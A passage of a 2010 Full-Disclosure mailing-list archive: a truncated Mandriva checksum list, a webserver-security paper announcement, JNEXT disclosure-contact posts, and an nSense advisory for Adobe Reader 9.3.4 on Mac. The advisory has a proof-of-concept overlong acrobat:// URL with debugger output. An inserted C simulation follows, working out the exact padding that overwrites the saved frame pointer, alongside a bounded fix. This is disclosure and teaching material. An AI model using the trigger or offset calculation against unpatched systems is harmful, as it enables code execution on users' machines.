2008.0/i586/libpq5-8.2.18-0.1mdv2008.0.i586.rpm
 c95169706bc5d0dd7520bdece5354e0a  
2008.0/i586/libpq-devel-8.2.18-0.1mdv2008.0.i586.rpm
 01e463f712ca216306d56e77a3a9bd12  
2008.0/i586/postgresql-8.2.18-0.1mdv2008.0.i586.rpm
 e7e9dcf8fcc7cb691066b0e1c8e84b08  
2008.0/i586/postgresql8.2-8.2.18-0.1mdv2008.0.i586.rpm
 5061d2dd0192413f6538400719906225  
2008.0/i586/postgresql8.2-contrib-8.2.18-0.1mdv2008.0.i586.rpm
 e31e99d6cf860d3362c10845014a12fa  
2008.0/i586/postgresql8.2-devel-8.2.18-0.1mdv2008.0.i586.rpm
 769ec11c6555dedd93012a1b92ebce68  
2008.0/i586/postgresql8.2-docs-8.2.18-0.1mdv2008.0.i586.rpm
 c8ac9f1032f924bee487d368b73a7f5f  
2008.0/i586/postgresql8.2-pl-8.2.18-0.1mdv2008.0.i586.rpm
 b67bcbc72ae5807430cdcbc355c1b185  
2008.0/i586/postgresql8.2-plperl-8.2.18-0.1mdv2008.0.i586.rpm
 ac8c444bddb034a172cce9490edf4f81  
2008.0/i586/postgresql8.2-plpgsql-8.2.18-0.1mdv2008.0.i586.rpm
 30223c2e6a478f2b02331541a9d56b0c  
2008.0/i586/postgresql8.2-plpython-8.2.18-0.1mdv2008.0.i586.rpm
 7ee4f67b04d3f4859a4d098a882894d2  
2008.0/i586/postgresql8.2-pltcl-8.2.18-0.1mdv2008.0.i586.rpm
 edf93c75a046749a0f74b900eb11bc3c  
2008.0/i586/postgresql8.2-server-8.2.18-0.1mdv2008.0.i586.rpm
 e3428e4a188bf6861c259b06deaee4ae  
2008.0/i586/postgresql8.2-test-8.2.18-0.1mdv2008.0.i586.rpm
 148d3cf6d7fd17b537574bf161595eb8  
2008.0/i586/postgresql-devel-8.2.18-0.1mdv2008.0.i586.rpm 
 8235eaa37082469e5dd9146010eb2b3b  
2008.0/SRPMS/postgresql8.2-8.2.18-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 8e005a4499089d4be1633c2767fceb3e  
2008.0/x86_64/lib64ecpg5-8.2.18-0.1mdv2008.0.x86_64.rpm
 5a5ed7202e7878652e2bc098b34acb51  
2008.0/x86_64/lib64ecpg-devel-8.2.18-0.1mdv2008.0.x86_64.rpm
 13de1a6c3c00123fd7dddfbe1d43cc27  
2008.0/x86_64/lib64pq5-8.2.18-0.1mdv2008.0.x86_64.rpm
 36e4c6537d3fa79a9358bd9e215928aa  
2008.0/x86_64/lib64pq-devel-8.2.18-0.1mdv2008.0.x86_64.rpm
 385d12eec49ef02c6cb80df69eb56d33  
2008.0/x86_64/postgresql-8.2.18-0.1mdv2008.0.x86_64.rpm
 62c87aa7c1d7c1f3cbf1bb2ae7f4501d  
2008.0/x86_64/postgresql8.2-8.2.18-0.1mdv2008.0.x86_64.rpm
 fba961f1816631c00de3a5d28c661520  
2008.0/x86_64/postgresql8.2-contrib-8.2.18-0.1mdv2008.0.x86_64.rpm
 41fd6f6e5787eb24bd40e4a01b8e9bca  
2008.0/x86_64/postgresql8.2-devel-8.2.18-0.1mdv2008.0.x86_64.rpm
 22fa656db75da6a9c8405eddc1b92c60  
2008.0/x86_64/postgresql8.2-docs-8.2.18-0.1mdv2008.0.x86_64.rpm
 df1364c07ff56a61d022d9074c15ae89  
2008.0/x86_64/postgresql8.2-pl-8.2.18-0.1mdv2008.0.x86_64.rpm
 f2bcaf5a19ab9fb09073254ad02b7fac  
2008.0/x86_64/postgresql8.2-plperl-8.2.18-0.1mdv2008.0.x86_64.rpm
 4e46a8cc010467e5e0c874f5033a7dbb  
2008.0/x86_64/postgresql8.2-plpgsql-8.2.18-0.1mdv2008.0.x86_64.rpm
 93d79de66e75dc93d7d537b32609d8d1  
2008.0/x86_64/postgresql8.2-plpython-8.2.18-0.1mdv2008.0.x86_64.rpm
 383b49120038dd7fdd159eb539001aa7  
2008.0/x86_64/postgresql8.2-pltcl-8.2.18-0.1mdv2008.0.x86_64.rpm
 abb559451cca4510884b42b443af75d7  
2008.0/x86_64/postgresql8.2-server-8.2.18-0.1mdv2008.0.x86_64.rpm
 54fd4dd2f83fa0ce9f10e8ae826fa935  
2008.0/x86_64/postgresql8.2-test-8.2.18-0.1mdv2008.0.x86_64.rpm
 6e9f4cbe5d4a73e599c8f255828f94c7  
2008.0/x86_64/postgresql-devel-8.2.18-0.1mdv2008.0.x86_64.rpm 
 8235eaa37082469e5dd9146010eb2b3b  
2008.0/SRPMS/postgresql8.2-8.2.18-0.1mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 d9c0f389520424306586d57c36eb875e  
2009.0/i586/libecpg8.3_6-8.3.12-0.1mdv2009.0.i586.rpm
 467f9f37e156f2a03d2e4ba55b75ee51  
2009.0/i586/libpq8.3_5-8.3.12-0.1mdv2009.0.i58

[Full-disclosure] Webserver-Security and Virtualization

2010-10-06 Thread Marcel Grabher (sallas)
Hi,

I'm working on a paper about Webserver-Security (free).
Objective: One should know about the risks and what can be done to mitigate
them.

The pictured topics are Threats and Countermeasures structured in Network,
OS, Service, App.

http://webservsec.blogspot.com/2010/10/threats.html

http://webservsec.blogspot.com/2010/10/countermeasures.html

I would really appreciate some comments on the graphics.
Probably I forgot about something.

BG
MG
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] nSense-2010-001: Adobe Reader for Macintosh

2010-10-06 Thread Henri Lindberg
   nSense Vulnerability Research Security Advisory NSENSE-2010-001
   ---

   Affected Vendor:Adobe
   Affected Product:   Adobe Reader 9.3.4 for Macintosh
   Platform:   OS X
   Impact: User assisted code execution
   Vendor response:Patch
   Credit: Knud / nSense

   Technical details
   ---

   terminal 1:
   $ gdb --waitfor=AdobeReader

   terminal 2:
   $ open acrobat://`perl -e 'print "A" x 12000'`

   terminal 1:
   (gdb) cont
   [snip]
   Program received signal EXC_BAD_ACCESS, Could not access memory.
   Reason: KERN_INVALID_ADDRESS at address: 0xc00013d2
   0x7ffa0d6a in AcroBundleThreadQuitProc ()
   (gdb) set disassembly-flavor intel
   (gdb) x/i $pc
   0x7ffa0d6a:    mov    BYTE PTR [ebp+eax-0x420],0x0
   (gdb) i r ebp eax
   ebp            0xbfffe908   0xbfffe908
   eax            0x2eea       12010
   (gdb)

   As can be seen from the above, we control the value in eax (in
   this case 12010, the length of the acrobat:// + the 12000 A's).

   This allows us to write the null byte anywhere in memory between
   ebp-0x420 (0xBFFFE4E8) and the end of the stack.

   The behaviour may be leveraged to modify the frame pointer,
   changing the execution flow and thus permitting arbitrary code
   execution in the context of the user running the program.

   Timeline:
   Aug 10th Contacted vendor PSIRT
   Aug 10th Vendor response. Vulnerability reproduced.
   Aug 16th Status update request sent to vendor
   Aug 17th Vendor response, still investigating
   Sep 2nd  Status update request sent to vendor
   Sep 3rd  Vendor response. Working on fix
   Sep 22nd Contacted vendor regarding patch date
   Sep 22nd Vendor response. Confirmed patch date.
   Sep 23rd Corrected researcher name
   Oct 1st  Vendor sent CVE identifier CVE-2010-3631
   Oct 5th  Vendor releases the patch
   Oct 6th  Advisory published

   http://www.nsense.fi   http://www.nsense.dk



   $$ss.   ,ss   ,S$s.  $$ss.   ,ss   ,S$s.
   $$$  `$$$  ($$(   $$$  `$$$  $$$  `$$$  ($$(   $$$  `$$$
   $$$   $$$`^$$s.   $  $$$   $$$`^$$s.   $
   $$$   $$$   )$$)  $$$$$$   $$$   )$$)  $$$
   $$$   $$$  ^$$7`7$P  $$$   $$$  ^$$7   `7$P

  D r i v e n   b y   t h e   c h a l l e n g e _
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
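The write in the nSense advisory above, reconstructed as an added C example (it is not nSense's or Adobe's code). The disassembly pins two facts: the local buffer sits at ebp-0x420 and the store index is eax, the length of the acrobat:// URL. Everything else here is assumed for the simulation: the frame layout (saved ebp and return address directly after the local), the START_EBP and return-address values, the handler bodies, and the fact that the frame lives in a heap block so the stray NUL can be inspected instead of crashing the process. The code recomputes the fault address from the registers gdb printed (0xbfffe908 + 12010 - 0x420 = 0xc00013d2), finds the 'A' count that lands the NUL byte exactly on the saved frame pointer (0x420 - strlen("acrobat://") = 1046), and pairs the unchecked terminator store with a bounded handler that rejects the same input.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Frame layout assumed from the faulting instruction
 * mov BYTE PTR [ebp+eax-0x420],0x0: a 0x420-byte local at ebp-0x420, then
 * (32-bit x86) the saved frame pointer and the return address. This is a
 * simulation in a heap block, not Adobe Reader's real stack. */
#define URL_BUF_SIZE 0x420
#define START_EBP    0xbfffe9f8u   /* constructed saved-ebp value */

typedef struct {
    uint8_t  buf[URL_BUF_SIZE];   /* local the handler NUL-terminates */
    uint32_t saved_ebp;           /* caller's frame pointer */
    uint32_t ret;                 /* return address */
    uint8_t  slack[16384];        /* keeps a simulated overrun inside the block */
} sim_frame_t;

/* The arithmetic gdb showed: effective address = ebp + eax - 0x420. */
uint32_t fault_address(uint32_t ebp, uint32_t eax)
{
    return ebp + eax - URL_BUF_SIZE;
}

/* "acrobat://" followed by n x 'A', as in the PoC; caller frees. */
char *make_poc_url(size_t n)
{
    const char *scheme = "acrobat://";
    size_t slen = strlen(scheme);
    char *url = malloc(slen + n + 1);
    if (url == NULL)
        return NULL;
    memcpy(url, scheme, slen);
    memset(url + slen, 'A', n);
    url[slen + n] = '\0';
    return url;
}

/* Hypothetical reconstruction of the bug: the terminator is stored at
 * buf[strlen(url)] and nothing checks that the index fits the local.
 * Returns the offset from the buffer base at which the NUL landed. */
size_t vulnerable_terminate(sim_frame_t *f, const char *url)
{
    size_t len = strlen(url);          /* attacker-controlled; this is eax */
    if (len >= sizeof *f)              /* guard for the simulation only */
        return (size_t)-1;
    ((uint8_t *)f)[len] = 0;           /* mov BYTE PTR [ebp+eax-0x420],0x0 */
    return len;
}

/* Hardened handler: bound the length before it becomes an index. */
int safe_copy_url(sim_frame_t *f, const char *url)
{
    size_t len = strlen(url);
    if (len >= URL_BUF_SIZE)
        return -1;                     /* reject over-long scheme URLs */
    memcpy(f->buf, url, len);
    f->buf[len] = '\0';
    return 0;
}

/* Drive both handlers with "acrobat://" + n x 'A' on a fresh simulated frame.
 * Returns 1 if the vulnerable handler's NUL hit the saved frame pointer
 * (n == 0x420 - strlen("acrobat://") == 1046 does it), 0 otherwise, -1 on
 * allocation failure; *safe_rc receives the hardened handler's verdict. */
int simulate(size_t n, int *safe_rc)
{
    sim_frame_t *f = malloc(sizeof *f);
    char *url = make_poc_url(n);
    if (f == NULL || url == NULL) { free(f); free(url); return -1; }
    memset(f, 0xcc, sizeof *f);
    f->saved_ebp = START_EBP;
    f->ret = 0x7ffa1000u;              /* constructed value */
    size_t off = vulnerable_terminate(f, url);
    int hit = off == URL_BUF_SIZE && ((uint8_t *)f)[URL_BUF_SIZE] == 0
              && f->saved_ebp != START_EBP;
    *safe_rc = safe_copy_url(f, url);
    free(url);
    free(f);
    return hit;
}

int main(void)
{
    int rc, hit;
    printf("fault address from gdb registers: 0x%08lx\n",
           (unsigned long)fault_address(0xbfffe908u, 12010u));
    hit = simulate(1046, &rc);
    printf("n=1046: saved ebp clobbered=%d, hardened rc=%d\n", hit, rc);
    hit = simulate(5, &rc);
    printf("n=5:    saved ebp clobbered=%d, hardened rc=%d\n", hit, rc);
    return 0;
}
```

Any C compiler will do; the address arithmetic is done in uint32_t so it matches the 32-bit process whatever the host is. The point the simulation makes is the one the advisory draws: a single attacker-positioned NUL is enough to change the saved frame pointer, so the fix has to reject or clamp the length before it is used as an index, not after.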

Re: [Full-disclosure] JNEXT vulnerability

2010-10-06 Thread Sherwyn
I say just release it and they will contact you in the future :). On a serious
note, check the archives, maybe the last 4 or so shows back on www.pauldotcom.com.

They had a guest on that developed a free disclosure model to help take these
types of stress off of you.
Infolookup
http://infolookup.securegossip.com
www.twitter.com/infolookup


-Original Message-
From: Blue Bird 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Tue, 5 Oct 2010 13:25:37 
To: 
Subject: [Full-disclosure] JNEXT vulnerability

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] JNEXT vulnerability

2010-10-06 Thread Blue Bird
Hi all -

I've been trying to reach the developer of JNEXT for some time now to report
a security vulnerability, anyone have contact info for Amnon David other
than the webform on his website?  http://www.jnext.org/sphp501/contact.php



Thanks.



BB
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/